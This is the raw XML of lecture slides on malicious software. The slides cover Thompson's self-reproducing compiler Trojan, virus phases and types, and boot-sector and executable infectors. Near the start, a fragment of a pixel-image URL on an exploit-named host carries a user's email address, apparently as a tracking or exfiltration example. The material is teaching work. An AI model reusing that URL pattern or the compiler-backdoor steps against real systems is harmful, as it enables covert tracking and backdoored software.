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5" y="29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%257Eganger/712.fall02/papers/p761-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loits.com/pixel.gif%3Fbbrown%2540spsu.edu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ulnerable.website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5829300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53400" y="6813042"/>
            <a:ext cx="1219200" cy="4259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36208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IT 4823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Administration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 dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0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Malicious Software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8"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="6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916940">
                        <a:lnSpc>
                          <a:spcPts val="2360"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3000" spc="0" baseline="-30555" dirty="0">
                          <a:latin typeface="Comic Sans MS"/>
                          <a:cs typeface="Comic Sans MS"/>
                        </a:rPr>
                        <a:t>	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L="532257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5077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Replicatin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g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16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roja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Horse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horse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makes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copies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itself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calle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opagating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15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ojan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horse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detect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29730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1976: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ger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 Schell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suggested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modifying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compile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includ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oja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hors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copied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itself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into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specific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programs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including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later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version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compiler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8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869439" lvl="1" indent="-285750">
                        <a:lnSpc>
                          <a:spcPct val="1004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1980s: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Ken</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="28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Thompson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implements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this: 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https:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" u="heavy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-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ww</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" u="heavy" spc="-135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.ece.cmu.edu/~ganger/712.fall02/papers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" u="heavy" spc="-1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/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  <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>p761-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000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u="heavy" spc="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thompson.pdf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5876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Thompson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’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Compiler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205" marR="101917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7569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Modify the compiler so that when it compiles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="27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logi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logi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accepts the use</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="10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s correct password or a fixed password (the same one for all users)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205" marR="67564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7569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Then modify the compiler again, so when it compiles a new version of the compile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the extra code to do the first step is automatically inserted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205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/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="877569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Recompile the compiler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7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205" marR="86741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7569" algn="l"/>
                          <a:tab pos="501142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Delete the source containing the modification and put the un-doctored source back.	(If someone recompiles with this source, the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="27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rojan horse will still be in the output.)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49275" algn="r">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1400" spc="-100" dirty="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Observation…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2580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amoun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sou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ce-leve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verificatio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scrutiny ca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completel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otec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yo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usin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untrustworthy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code.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62865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Having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source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ode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helps,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but does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nsure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you’re safe;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you are trusting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ompile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operating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etc.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58610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mprov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afet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auditin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objec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code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hideousl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time-consumin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process.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Compute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rus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0845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Program that inserts itself into one or more files and performs some action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i="1" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Insertion</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400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phase</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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insertin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itsel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file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30175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i="1" spc="-13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rigger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Even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conditio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initiate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execution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phase.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i="1" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Execution</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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phase</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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performin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som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(possibl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null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action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4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Insertion phase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mus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be present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Nee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alway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executed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93916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Lehig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viru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inserte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itsel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boo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onl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boo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file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not infected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Phases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Dormant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507490" lvl="1" indent="-28575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virus is idle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5074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wil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eventuall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activate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som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event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5074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viruse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hav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stage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ts val="335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riggering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507490" marR="1369695" lvl="1" indent="-28575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viru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activate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perfor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cause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 variety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of system events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ts val="335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Propagation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507490" marR="1462405" lvl="1" indent="-28575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507490" algn="l"/>
                          <a:tab pos="449326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viru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place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cop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itsel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othe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program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or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certain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system areas on	disk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5074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5074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identica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propagatin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version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ts val="335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Execution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payloa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functio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performed.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First Reports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Brain (Pakistani) virus (1986)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MS-DOS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12585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Alters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boot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sectors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floppies,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spreads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other floppies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MacMag Peace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virus (1987)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Macintosh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915669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Print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“universa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messag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peace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Marc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2, 198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delete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itself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939289">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pP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 Classification by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arget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Boot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sector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infector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665480" lvl="1" indent="-28575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infect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maste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boo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recor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boo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recor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spreads whe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syste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boote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fro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dis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containin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virus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infector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779145" lvl="1" indent="-28575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infect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file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operatin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system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or shell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considers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executable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Macro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virus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641985" lvl="1" indent="-28575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infect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file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macr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scriptin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cod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interpreted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application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Multipartit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virus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infect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file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multipl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ays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03886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Classification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by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Concealment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Strategy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SzPct val="88888"/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Encrypted virus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450340" marR="828040" lvl="1" indent="-337185" algn="just">
                        <a:lnSpc>
                          <a:spcPts val="2590"/>
                        </a:lnSpc>
                        <a:buSzPct val="88888"/>
                        <a:buFont typeface="Arial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 portion of the virus creates a random encryption key and encrypts the remainder of the virus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spcBef>
                          <a:spcPts val="20"/>
                        </a:spcBef>
                        <a:buSzPct val="88888"/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Stealth virus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450340" marR="1132205" lvl="1" indent="-337185">
                        <a:lnSpc>
                          <a:spcPts val="2590"/>
                        </a:lnSpc>
                        <a:buSzPct val="88888"/>
                        <a:buFont typeface="Arial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 form of virus explicitly designed to hide itself from detection by anti-virus software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spcBef>
                          <a:spcPts val="20"/>
                        </a:spcBef>
                        <a:buSzPct val="88888"/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Polymorphic virus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450340" lvl="1" indent="-337185">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buSzPct val="88888"/>
                        <a:buFont typeface="Arial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 virus that mutates with every infection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107440" indent="-342900">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buSzPct val="88888"/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Metamorphic virus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450340" marR="826769" lvl="1" indent="-337185" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="80000"/>
                        </a:lnSpc>
                        <a:buSzPct val="88888"/>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="14503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 virus that mutates and rewrites itself completely at each iteration and may change behavior as well as appearance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8800" y="4964429"/>
            <a:ext cx="5486400" cy="685800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5486400" h="685800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548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24227" y="4959858"/>
            <a:ext cx="5496306" cy="695706"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5496306" y="693419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5496306" y="2285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549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93420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="4572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="4571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5494020" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5496306" y="693419"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="9905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496306" h="695706">
                <a:moveTo>
                  <a:pt x="9905" y="6858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685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="685800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4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="690371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9905" y="695706"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9906" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="695706"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5490972" y="9905"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5486400" y="4571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="9905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5490972" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="685799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5490972" y="695705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5490972" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="690371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="695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24200" y="5802629"/>
            <a:ext cx="5486400" cy="685800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5486400" h="685800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548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19627" y="5798058"/>
            <a:ext cx="5496306" cy="695706"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5496306" y="693419"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5496306" y="2285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549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93420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="4572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="4571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5494020" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5496306" y="693419"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="9905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496306" h="695706">
                <a:moveTo>
                  <a:pt x="9905" y="6858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685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="685800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4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="690371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9905" y="695706"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9906" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9905" y="695706"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5490972" y="9905"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5486400" y="4571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="9905"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5490972" y="685799"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5490972" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="9905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="685799"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5496306" h="695706">
                <a:moveTo>
                  <a:pt x="5490972" y="695705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5490972" y="685799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486400" y="690371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5486399" y="695705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490972" y="695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28800" y="5802629"/>
            <a:ext cx="1295400" cy="685800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1295400" h="685800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295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24227" y="5798058"/>
            <a:ext cx="1305306" cy="695706"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="1305306" y="693420"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1305306" y="2286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303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93420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="6957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295400" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="4572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299972" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299972" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303020" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1305306" y="693420"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1305306" h="695706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305306" h="695706">
                <a:moveTo>
                  <a:pt x="9906" y="6858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685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="685800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="1299972" y="685800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299972" y="685800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="9906" y="695706"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9906" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="695706"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="1299972" y="9906"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1295400" y="4572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299972" y="9906"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="1299972" y="685800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1299972" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="9906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299972" y="685800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1305306" h="695706">
                <a:moveTo>
                  <a:pt x="1299972" y="695706"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1299972" y="685800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="690372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295400" y="695706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299972" y="6957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5176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Boot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Sector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Infectors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virus that inserts itself into the boot sector of a disk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Section of disk contains the virus code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Executed when system first “sees” the disk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817244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Including at boot time … and completely independent of the operating system (!)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But depends upon CPU architecture.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  <a:spcBef>
                          <a:spcPts val="38"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1000"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1450340">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow"/>
                          <a:cs typeface="Arial Narrow"/>
                        </a:rPr>
                        <a:t>Maste</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="0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2400" spc="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400" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow"/>
                          <a:cs typeface="Arial Narrow"/>
                        </a:rPr>
                        <a:t>boo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400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2400" spc="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400" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow"/>
                          <a:cs typeface="Arial Narrow"/>
                        </a:rPr>
                        <a:t>record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9"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1450340" marR="4271010">
                        <a:lnSpc>
                          <a:spcPct val="58500"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="2745740" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600" spc="-7" baseline="18518" dirty="0">
                          <a:latin typeface="Arial Narrow"/>
                          <a:cs typeface="Arial Narrow"/>
                        </a:rPr>
                        <a:t>Maliciou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" spc="0" baseline="18518" dirty="0">
                          <a:latin typeface="Arial Narrow"/>
                          <a:cs typeface="Arial Narrow"/>
                        </a:rPr>
                        <a:t>s	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow"/>
                          <a:cs typeface="Arial Narrow"/>
                        </a:rPr>
                        <a:t>Maste</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="0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2400" spc="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400" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow"/>
                          <a:cs typeface="Arial Narrow"/>
                        </a:rPr>
                        <a:t>boo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400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2400" spc="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2400" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow"/>
                          <a:cs typeface="Arial Narrow"/>
                        </a:rPr>
                        <a:t>record code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39389" y="3062477"/>
            <a:ext cx="1024127" cy="6522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75966" y="3267455"/>
            <a:ext cx="950213" cy="242315"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="950213" h="242315">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="242315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950213" y="242315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95021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24455" y="2000250"/>
            <a:ext cx="950213" cy="6332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670" y="1981200"/>
            <a:ext cx="148589" cy="652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89176" y="3062477"/>
            <a:ext cx="950213" cy="6339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63517" y="3062477"/>
            <a:ext cx="149351" cy="633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60594" y="2372851"/>
            <a:ext cx="223263" cy="167630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="223263" h="167630">
                <a:moveTo>
                  <a:pt x="186689" y="112007"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="149354" y="167630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223263" y="55622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186689" y="112007"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="1863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60597" y="2372867"/>
            <a:ext cx="223265" cy="167639"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="223265" h="167639">
                <a:moveTo>
                  <a:pt x="223265" y="55625"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149351" y="167639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186689" y="112013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223265" y="556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47283" y="2503142"/>
            <a:ext cx="502916" cy="316991"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="502916" h="316991">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="503123" y="316865"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="1863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38194" y="2875756"/>
            <a:ext cx="112006" cy="149348"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="112006" h="149348">
                <a:moveTo>
                  <a:pt x="74670" y="19044"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="112006" y="37327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="149348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37335" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74670" y="19044"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="1862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838194" y="2875788"/>
            <a:ext cx="112013" cy="149351"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="112013" h="149351">
                <a:moveTo>
                  <a:pt x="112013" y="37337"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="74675" y="19050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37337" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="149352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112013" y="373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12865" y="2838416"/>
            <a:ext cx="18293" cy="37340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="18293" h="37340">
                <a:moveTo>
                  <a:pt x="0" y="37340"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18293" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="1862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7247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Executable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Infectors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1654175">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="2604770" algn="l"/>
                          <a:tab pos="3517265" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" baseline="10416" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>0	100	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First program instruction to be e </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="16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7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ecuted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1600" spc="-2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baseline="10416" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>1000</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" baseline="10416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400"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="50"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1400"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1318895">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="2269490" algn="l"/>
                          <a:tab pos="3256279" algn="l"/>
                          <a:tab pos="6572250" algn="l"/>
                          <a:tab pos="7540625" algn="l"/>
                        </a:tabLst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0	100	200	1000	1100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87"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1100"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="110680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617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virus that infects executable programs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678305" lvl="1" indent="-4572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7767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infect either .EXE or .COM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on PCs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678305" marR="1181735" lvl="1" indent="-4572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7767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May prepend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itself (as shown) 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put itself anywhere, fixing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up binary so it is executed at some point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1789002" y="3062273"/>
          <a:ext cx="6622290" cy="6518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71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3221">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="148590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Header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33">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="18633">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="18633">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1863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Virus code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33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38">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1863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24">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1862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9820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600" spc="105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ecutable code and data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38">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="18638">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1863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2124279" y="2000052"/>
          <a:ext cx="5597407" cy="6518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0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3221">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="129539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Header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33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33">
